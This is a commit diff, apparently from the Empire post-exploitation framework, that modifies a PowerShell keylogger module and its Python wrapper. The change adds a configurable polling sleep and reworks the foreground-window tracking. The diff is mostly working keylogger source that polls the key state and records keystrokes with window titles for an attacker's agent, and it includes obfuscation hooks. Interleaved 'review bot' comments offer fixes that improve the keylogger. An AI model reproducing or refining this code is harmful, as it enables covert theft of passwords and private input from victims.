Fix for missing keylogger characters (#252)
* Added sleep option to keystrokes module

* Fix foreground window delay for keylogger

* Added option for changing sleep time for keylogger

* Removed timer from ps1
Cx01N authored Jul 18, 2020
1 parent ed065e6 commit 4a9cec9
Showing 2 changed files with 44 additions and 30 deletions.
36 changes: 22 additions & 14 deletions data/module_source/collection/Get-Keystrokes.ps1
@@ -1,21 +1,27 @@
function Get-Keystrokes {
<#
.SYNOPSIS
Logs keys pressed, time and the active window (when changed).
Some modifications for Empire by @harmj0y.
PowerSploit Function: Get-Keystrokes
Author: Chris Campbell (@obscuresec) and Matthew Graeber (@mattifestation)
Modifications: @harmj0y
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.LINK
http://www.obscuresec.com/
http://www.exploit-monday.com/
#>
param
(
[Parameter(Mandatory = $False)]
[string]
$Sleep = 1
)

[Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms') | Out-Null

Expand Down Expand Up @@ -107,14 +113,14 @@ function Get-Keystrokes {
$LastWindowTitle = ""

while ($true) {
Start-Sleep -Milliseconds 40
Start-Sleep -Milliseconds $Sleep
$gotit = ""
$Outout = ""

for ($char = 1; $char -le 254; $char++) {
$vkey = $char
$gotit = $ImportDll::GetAsyncKeyState($vkey)

if ($gotit -eq -32767) {

#check for keys not mapped by virtual keyboard
Expand Down Expand Up @@ -155,19 +161,21 @@ function Get-Keystrokes {
if ([Console]::CapsLock) {$Outout += '[Caps Lock]'}

$scancode = $ImportDll::MapVirtualKey($vkey, 0x3)

$kbstate = New-Object Byte[] 256
$checkkbstate = $ImportDll::GetKeyboardState($kbstate)

$mychar = New-Object -TypeName "System.Text.StringBuilder";
$unicode_res = $ImportDll::ToUnicode($vkey, $scancode, $kbstate, $mychar, $mychar.Capacity, 0)

#get the title of the foreground window
$TopWindow = $ImportDll::GetForegroundWindow()
$WindowTitle = (Get-Process | Where-Object { $_.MainWindowHandle -eq $TopWindow }).MainWindowTitle

if ($unicode_res -gt 0) {
if ($WindowTitle -ne $LastWindowTitle){
#get the title of the foreground window
$TopWindow = $ImportDll::GetForegroundWindow()

if ($TopWindow -ne $LastTopWindow){
$LastTopWindow = $TopWindow
$WindowTitle = (Get-Process | Where-Object { $_.MainWindowHandle -eq $TopWindow }).MainWindowTitle

# if the window has changed
$TimeStamp = (Get-Date -Format dd/MM/yyyy:HH:mm:ss:ff)
$Outout = "`n`n$WindowTitle - $TimeStamp`n"
Expand All @@ -179,4 +187,4 @@ function Get-Keystrokes {
}
}
}
}
}
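Review bot: `$Sleep` is declared `[string]` in the new `param` block, but its only visible use is `Start-Sleep -Milliseconds $Sleep`, which expects an integer, so a non-numeric value passes parameter binding and then fails on every pass of the `while ($true)` loop instead of once at the call. Declaring it as `[int] $Sleep = 1` would reject bad input at binding time. The comment-based help has no entry for the new parameter; adding `.PARAMETER Sleep` with a line such as `Delay in milliseconds between polling passes of the key-state loop.` would document it. In the last hunk `$LastTopWindow` is compared with `$TopWindow`, but only `$LastWindowTitle = ""` is initialised in the visible lines, so its initialisation, if there is one, sits outside the hunks shown; the function body continues outside them as well.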
38 changes: 22 additions & 16 deletions lib/modules/powershell/collection/keylogger.py
Expand Up @@ -15,24 +15,25 @@ def __init__(self, mainMenu, params=[]):

'Author': ['@obscuresec', '@mattifestation', '@harmj0y'],

'Description': ('Logs keys pressed, time and the active window (when changed) to the keystrokes.txt file. This file is located in the agents downloads directory Empire/downloads/<AgentName>/keystrokes.txt.'),
'Description': (
'Logs keys pressed, time and the active window (when changed) to the keystrokes.txt file. This file is located in the agents downloads directory Empire/downloads/<AgentName>/keystrokes.txt.'),

'Software': '',

'Techniques': ['T1056'],

'Background' : True,
'Background': True,

'OutputExtension' : None,

'NeedsAdmin' : False,
'OutputExtension': None,

'OpsecSafe' : True,
'NeedsAdmin': False,

'Language' : 'powershell',
'OpsecSafe': True,

'Language': 'powershell',

'MinLanguageVersion': '2',

'MinLanguageVersion' : '2',

'Comments': [
'https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1'
]
Expand All @@ -42,10 +43,15 @@ def __init__(self, mainMenu, params=[]):
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
'Agent': {
'Description': 'Agent to run module on.',
'Required': True,
'Value': ''
},
'Sleep': {
'Description': 'Sleep time [ms] between key presses. Shorter times may increase CPU usage on the target.',
'Required': False,
'Value': '1'
}
}

Expand All @@ -59,7 +65,6 @@ def __init__(self, mainMenu, params=[]):
if option in self.options:
self.options[option]['Value'] = value


def generate(self, obfuscate=False, obfuscationCommand=""):

# read in the common module source code
Expand All @@ -78,7 +83,7 @@ def generate(self, obfuscate=False, obfuscationCommand=""):

scriptEnd = "Get-Keystrokes "

for option,values in self.options.items():
for option, values in self.options.items():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
Expand All @@ -88,7 +93,8 @@ def generate(self, obfuscate=False, obfuscationCommand=""):
scriptEnd += " -" + str(option) + " " + str(values['Value'])

if obfuscate:
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd,
obfuscationCommand=obfuscationCommand)
script += scriptEnd
script = helpers.keyword_obfuscation(script)
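Review bot: The description of the new `Sleep` option, "Sleep time [ms] between key presses", does not match how the value is used: in Get-Keystrokes.ps1 it is the `Start-Sleep -Milliseconds` delay between polling passes of the `while ($true)` loop, and the default appears to drop from the previous fixed 40 to 1. A closer wording would be `'Description': 'Polling interval [ms] between keyboard-state scans. Shorter intervals increase CPU usage on the host.'`. The value is also appended to `scriptEnd` as raw text by `scriptEnd += " -" + str(option) + " " + str(values['Value'])` in `generate`, so checking `values['Value'].isdigit()` for this option before that line would keep a mistyped value from producing a malformed command line. Both `__init__` and `generate` start and end outside the visible hunks.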
